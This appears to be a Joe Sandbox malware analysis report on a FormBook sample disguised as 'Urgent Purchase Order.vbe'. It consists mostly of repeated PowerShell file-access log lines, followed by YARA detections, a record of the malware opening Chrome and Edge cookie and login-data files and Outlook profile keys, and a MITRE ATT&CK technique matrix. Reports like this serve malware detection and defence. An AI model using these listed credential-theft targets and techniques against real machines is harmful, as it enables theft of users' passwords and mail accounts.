Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 13.2.vbc.exe.9b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.vbc.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.3719481348.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3742236502.00000000088B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1556677119.00000000009B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1563636022.0000000007ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3724227677.0000000003300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3724379961.0000000003350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3726655209.0000000004F20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1563569316.0000000005680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\xcopy.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 13.2.vbc.exe.9b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.vbc.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.3719481348.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3742236502.00000000088B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1556677119.00000000009B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1563636022.0000000007ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3724227677.0000000003300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3724379961.0000000003350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3726655209.0000000004F20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1563569316.0000000005680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	311 Scripting	Valid Accounts	11 Windows Management Instrumentation	311 Scripting	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	114 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	512 Process Injection	3 Obfuscated Files or Information	Security Account Manager	121 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	4 PowerShell	Login Hook	Login Hook	1 Software Packing	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	512 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Rundll32	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Urgent Purchase Order.vbe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Urgent Purchase Order.vbe